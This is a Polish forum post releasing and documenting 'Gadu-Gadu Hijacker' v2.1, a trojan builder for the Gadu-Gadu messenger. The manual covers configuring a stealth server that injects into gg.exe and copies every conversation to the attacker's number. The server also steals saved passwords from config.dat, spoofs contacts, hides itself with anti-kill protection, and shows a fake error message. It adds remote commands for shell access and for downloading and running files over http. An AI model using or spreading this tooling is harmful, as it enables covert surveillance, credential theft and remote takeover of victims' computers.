Wojass
Użytkownik
- Dołączył
- Sierpień 22, 2003
- Posty
- 347
Udostępniam do przetestowania kolejną wersję GGH, tym razem niema większych różnic od poprzednie wersji 2.0. Dodałem możliwość wyciągania haseł z GG (config.dat), lepsze ukrywanie GGH w systemie oraz usuwanie, aktualizowanie GGH on-line i kilka drobnych zmian w kodzie :]
____________________________________________________
= Gadu-Gadu Hijacker v.2.1 by Wojass - United Crew =
____________________________________________________
W skrócie: Gadu-Gadu Hijacker (GGH) jest programem służącym do przechwytywania
wszystkich rozmów prowadzonych za pomocą komunikatora Gadu-Gadu.
Wymagania: Komunikator Gadu-Gadu
Testowano: WinXP + SP2 + Gadu-Gadu v 6.1 build 158 (program powinien działać z Gadu-Gadu_v.7.0)
GGH nie jest samodzielnym programem jest "dodatkiem" do oryginalnego komunikatora, dokładniej biblioteką DLL
wstrzykiwaną w proces komunikatora gg.exe (GGH nie modyfikuje tego pliku).
Każda wysyłana wiadomość trafia równocześnie do adresata oraz na numer GG Klienta który,
podajemy w konfiguratorze (Client GG) - tak samo dzieje się w przypadku przychodzących wiadomości.
Instalacja & konfiguracja:
Uruchamiamy GGH konfigurator.
CLIENT GG - tutaj podajemy swój 7 cyfrowy numer GG. Na ten numer będą przychodzić wszystkie logowane wiadomości i powiadomienia*
tylko z tego numeru można wysyłać polecenia i tylko tego numeru dotyczy opcja Spoofing.
(*-powiadomienie nie jest wysyłane podczas uruchomienia GGH tylko po zalogowaniu się w GaduGadu.)
MSG LOGGING - włączone/wyłączone logowanie rozmów na stałe, opcję można tymczasowo włączyć/wyłączyć za pomocą komend GGH.
SPOOFED GG - tutaj podajemy 7 cyfrowy numer GG, pod który można podszyć. się
Wiadomości GG otrzymywane z numeru podanego w "CLIENT GG" będą
wyświetlane jako wiadomość od "SPOOFED GG" , działa to w dwie
strony tzn. każda wysłana wiadomość pod numer "SPOOFED GG"
zostanie przekierowana na numer "CLIENT GG".
Numer SPOOFED GG można zmienić tymczasowo za pomocą komend GGH
SPOOFING - włączony/wyłączony Spoofing na stałe, opcję można tymczasowo włączyć/wyłączyć za pomocą komend GGH.
AUTOSTART - Wybieramy folder instalacji GGH
Current - bieżący folder, GGH zainstaluje się w folderze, w którym został odpalony. (bez kopiowania)
Windows - GGH kopiuje się do folderu Windows
WindowsSystem32 - jw. WindowsSystem32
Gadu-Gadu InstallPath - GGH kopiuje się do folderu komunikatora Gadu-Gadu lub Windows w przypadku nie wykrycia GG
Uruchamiaj razem z Windows - chyba nie trzeba tłumaczyć
Ukrywaj w systemie - GGH ukryje swój proces, pliki, wpisy w rejestrze
oraz włączy ochronę swojego procesu przed zakończeniem - Anti-Kill
Usuń po instalacji - jeżeli GGH jest uruchamiany w folderze innym niż ten zdefiniowany w AUTOSTART,
plik GGH zostanie usunięty po instalacji do folderu docelowego.
FAKE ERROR - Można ustawić sobie dowolny komunikat fałszywego błędu,
który zostanie wyświetlony podczas pierwszego uruchomienia.
ICON - Dodaje ikonę do pliku GGH (pliki *.ICO)
FSG - Fast Small Good Exe Packer, zmniejszy rozmiar serwera GGH.
GENERATE - tworzy serwer GGH z podanymi ustawieniami.
koniec konfiguracji, teraz trzeba uruchomić wygenerowany plik na komputerze z którego chcemy otrzymywać logi rozmów,
aby GGH mógł działać, na komputerze musi być zainstalowany oryginalny klient Gadu-Gadu z nazwą pliku "gg.exe"
Firewall Bypassing:
Jeśli na komputerze zainstalowany jest Firewall to do korzystania z samego komunikatora Gadu-Gadu
niezbędne jest przepuszczenie jego połączeń. Tym samym umożliwiamy swobodną pracę GGHijacker`a.
Praca GGH jest niezauważalna przez programy typu Firewall ponieważ GGH nie otwiera żadnych portów
i nie wykonuje żadnych połączeń*.
*- jedynym wyjątkiem jest użycie wbudowanego w GGH Downloader`a, którym można ściągnąć na dysk dowolny plik za pomocą http.
Oprócz logowania rozmów GG, program umożliwia:
- dostęp do linii poleceń CMD.EXE (znacznie zwiększa to zakres możliwości GGH)
- wyciąganie haseł GG z pliku config.dat
- pobieranie plików za pomocą http
- podszywanie się pod inne numery GG
Polecenia wewnętrzne GGH:
GGH ma klika własnych komend, wpisuje się je wprost w okno rozmowy (podobnie jak w G@du-Ghost Trojan) z numerem GG,
który pracuje na komunikatorze Gadu-Gadu z zainstalowanym GGHijackerem. Komendy nie są wyświetlane u odbiorcy.
GGH akceptuje tylko komendy wysyłane z numeru Klienta.
Komendy:
( bez " " )
" `info " - informacje o systemie
" `log " - włącza logowanie rozmów.
" `log off " - wyłącza logowanie rozmów.
" `spoof " - włącza podszywanie się pod inne numery.
" `spoof XXXXXXX " - włącza spoofing pod numer XXXXXXX (wymagane 7 cyfr, pierwsza od 1 do 9)
" `spoof off " - wyłącza podszywanie.
" `cmd " - włącza dostęp do linii poleceń.
" `cmd off " - wyłącza dostęp do linii poleceń.
" `download http://... " - ściąga plik z serwera WWW (wymagane "http://").
" `update http://... " - usuwa GGH, pobiera i uruchamia plik z serwera WWW
" `pass " - wyciąga hasła GG (config.dat)
" `uninstall " - usuwa GGH z systemu
" ` " - help
Znak " ` " (ten pod Esc) na początku wiadomości powoduje ze nie jest ona wyświetlana w komunikatorze
tylko przetwarzana przez GGH
Dodatkowe informacje:
Numery GG muszą być 7 cyfrowe , niezaczynające się zerem.
Nazwa pliku Gadu-Gadu musi być "gg.exe"
Podczas ściągania pliku za pomocą `download oraz dostępu do linii poleceń `cmd pozostałe funkcje
zostają wyłączone (należy je ponownie włączyć).
Wiadomości wysłane z numeru Klienta do GGH nie są logowane.
--------------------------------------------------------------------
Podstawowe polecenia CMD:
Aby uzyskać więcej informacji o poleceniu, wpisz HELP nazwa_polecenia
ASSOC Wyświetla lub modyfikuje skojarzenia rozszerzeń plików.
AT Planuje wykonanie poleceń i programów.
ATTRIB Wyświetla lub zmienia atrybuty pliku.
BREAK Wyłącza lub włącza rozszerzone sprawdzanie klawiszy CTRL+C.
CACLS Wyświetla lub modyfikuje listy kontroli dostępu (ACL) plików.
CALL Wywołuje jeden program wsadowy z innego.
CD Wyświetla lub zmienia nazwę bieżącego katalogu.
CHCP Wyświetla lub ustawia numer aktywnej strony kodowej.
CHDIR Wyświetla lub zmienia nazwę bieżącego katalogu.
CHKDSK Sprawdza dysk i wyświetla raport o jego stanie.
CHKNTFS Wyświetla lub modyfikuje stan sprawdzania dysku przy rozruchu.
CLS Czyści ekran.
CMD Uruchamia nowe wystąpienie interpretera poleceń systemu Windows.
COLOR Ustawia domyślny kolor tła i pierwszego planu konsoli.
COMP Porównuje zawartość dwóch plików lub zestawów plików.
COMPACT Wyświetla i pozwala na modyfikację listy plików. skompresowanych na
partycji NTFS.
CONVERT Konwertuje woluminy FAT na woluminy NTFS. Nie można konwertować
bieżącego dysku.
COPY Kopiuje jeden lub wiele plików w inne miejsce.
DATE Wyświetla lub ustawia datę.
DEL Usuwa jeden lub wiele plików.
DIR Wyświetla listę plików i podkatalogów katalogu.
DISKCOMP Porównuje zawartość dwóch dyskietek.
DISKCOPY Kopiuje zawartość jednej dyskietki na drugą.
DOSKEY Edytuje wiersze poleceń, przywraca polecenia Windows i tworzy makra.
ECHO Wyświetla komunikaty lub wyłącza i włącza echo poleceń.
ENDLOCAL Kończy lokalne zmiany środowiska w plikach wsadowych.
ERASE Usuwa jeden lub wiele plików.
EXIT Kończy działanie programu CMD.EXE (interpretera poleceń).
FC Porównuje dwa pliki lub zestawy plików i wyświetla różnice między
nimi.
FIND Wyszukuje ciąg tekstowy w pliku lub plikach.
FINDSTR Wyszukuje ciągi znaków w plikach.
FOR Uruchamia podane polecenie dla każdego pliku z zestawu plików.
FORMAT Formatuje dysk do użytku w systemie Windows.
FTYPE Wyświetla i modyfikuje typy plików używane w skojarzeniach rozszerzeń
plików.
GOTO Przekazuje sterowanie interpretera poleceń systemu Windows do wiersza
o podanej etykiecie w pliku wsadowym.
GRAFTABL Włącza wyświetlanie przez system Windows znaków rozszerzonych w
trybie graficznym.
HELP Podaje informacje o poleceniach systemu Windows.
IF Dokonuje warunkowego przetwarzania w plikach wsadowych.
LABEL Tworzy, zmienia lub usuwa etykietę(etykiety) woluminu dysku.
MD Tworzy katalog.
MKDIR Tworzy katalog.
MODE Konfiguruje urządzenia systemowe.
MORE Wyświetla informacje ekran po ekranie.
MOVE Przenosi jeden lub wiele plików z jednego katalogu do drugiego.
PATH Wyświetla lub ustawia ścieżkę przeszukiwania dla plików wykonywalnych.
PAUSE Wstrzymuje przetwarzanie pliku wsadowego i wyświetla komunikat.
POPD Przywraca katalog zapisany przez PUSHD.
PRINT Drukuje plik tekstowy.
PROMPT Zmienia znak zachęty wiersza polecenia systemu Windows.
PUSHD Zapisuje bieżący katalog, a następnie zamienia go.
RD Usuwa katalog.
RECOVER Odzyskuje możliwe do odczytania informacje z uszkodzonego dysku.
REM Oznacza komentarze w pliku wsadowym lub pliku CONFIG.SYS.
REN Zmienia nazwę pliku lub plików.
RENAME Zmienia nazwę pliku lub plików.
REPLACE Zamienia pliki.
RMDIR Usuwa katalog.
SET Wyświetla, ustawia lub usuwa zmienne środowiskowe systemu Windows.
SETLOCAL Rozpoczyna lokalne zmiany środowiska w plikach wsadowych.
SHIFT Zmienia pozycje parametrów w pliku wsadowym.
SORT Sortuje wprowadzone dane.
START Uruchamia program lub polecenie w oddzielnym oknie.
SUBST Przypisuje ścieżce literę dysku.
TIME Wyświetla lub ustawia czas systemowy.
TITLE Ustawia tytuł okna dla sesji CMD.EXE.
TREE Wyświetla strukturę katalogów dysku lub ścieżki.
TYPE Wyświetla zawartość pliku tekstowego.
VER Wyświetla wersję systemu Windows.
VERIFY Instruuje system Windows, aby sprawdzał poprawność zapisu plików na
dysku.
VOL Wyświetla etykietę oraz numer seryjny dysku.
XCOPY Kopiuje pliki i katalogi.
--------------------------------------------------------------------
______________________________
| http://wojass.unitedcrew.net |
______________________________[/b]